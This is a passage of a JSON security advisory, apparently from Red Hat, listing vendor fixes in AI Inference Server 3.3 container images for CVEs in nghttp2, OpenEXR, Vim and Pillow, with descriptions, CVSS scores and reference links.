"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "RHBZ#2448754",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448754"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27135"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1",
"url": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6",
"url": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6"
}
],
"release_date": "2026-03-18T17:59:02.045000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination"
},
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
},
{
"cve": "CVE-2026-28417",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-02-27T22:01:53.728412+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open-source command-line text editor. Specifically, an operating system (OS) command injection vulnerability exists in the `netrw` standard plugin. A remote attacker could exploit this by tricking a user into opening a specially crafted URL, such as one using the `scp://` protocol handler. Successful exploitation allows the attacker to execute arbitrary shell commands with the same privileges as the Vim process, leading to potential system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via OS command injection in the netrw plugin",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The risk posed by this vulnerability is limited on Red Hat products due to user and system isolation features which are enabled by default. The impacts of this flaw will be limited by the active user\u0027s permissions and access control limits. Host systems are not at risk when following Red Hat guidelines and the root user account is not actively executing Vim.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28417"
},
{
"category": "external",
"summary": "RHBZ#2443455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28417",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28417"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28417",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28417"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/79348dbbc09332130f4c860",
"url": "https://github.com/vim/vim/commit/79348dbbc09332130f4c860"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0073",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0073"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-m3xh-9434-g336",
"url": "https://github.com/vim/vim/security/advisories/GHSA-m3xh-9434-g336"
}
],
"release_date": "2026-02-27T21:54:35.196000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Arbitrary code execution via OS command injection in the netrw plugin"
},
{
"cve": "CVE-2026-28421",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-27T23:01:44.673504+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443474"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim. This vulnerability, a heap-buffer-overflow and a segmentation fault, exists in the swap file recovery logic. A local attacker could exploit this by providing a specially crafted swap file. This could lead to a denial of service (DoS) or potentially information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Denial of service and information disclosure via crafted swap file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The risk posed by this vulnerability is limited on Red Hat products due to user and system isolation features which are enabled by default. The impacts of this flaw will be limited by the active user\u0027s permissions and access control limits. Host systems are not at risk when following Red Hat guidelines and the root user account is not actively executing Vim.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28421"
},
{
"category": "external",
"summary": "RHBZ#2443474",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443474"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28421",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28421"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28421",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28421"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/65c1a143c331c886dc28",
"url": "https://github.com/vim/vim/commit/65c1a143c331c886dc28"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0077",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0077"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-r2gw-2x48-jj5p",
"url": "https://github.com/vim/vim/security/advisories/GHSA-r2gw-2x48-jj5p"
}
],
"release_date": "2026-02-27T22:06:34.312000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Denial of service and information disclosure via crafted swap file"
},
{
"cve": "CVE-2026-33412",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-03-24T20:02:21.511965+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450907"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim. By including a newline character in a pattern passed to Vim\u0027s glob() function, an attacker may be able to execute arbitrary shell commands. This command injection vulnerability allows for arbitrary code execution, depending on the user\u0027s shell settings.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via command injection in glob() function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33412"
},
{
"category": "external",
"summary": "RHBZ#2450907",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450907"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33412",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33412"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33412",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33412"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a",
"url": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0202",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0202"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c",
"url": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c"
}
],
"release_date": "2026-03-24T19:43:07.219000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vim: Vim: Arbitrary code execution via command injection in glob() function"
},
{
"cve": "CVE-2026-40192",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-04-16T00:00:49.590876+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2458856"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "RHBZ#2458856",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
"url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9521",
"url": "https://github.com/python-pillow/Pillow/pull/9521"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
},
{
"category": "external",
"summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
"url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
}
],
"release_date": "2026-04-15T22:53:56.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
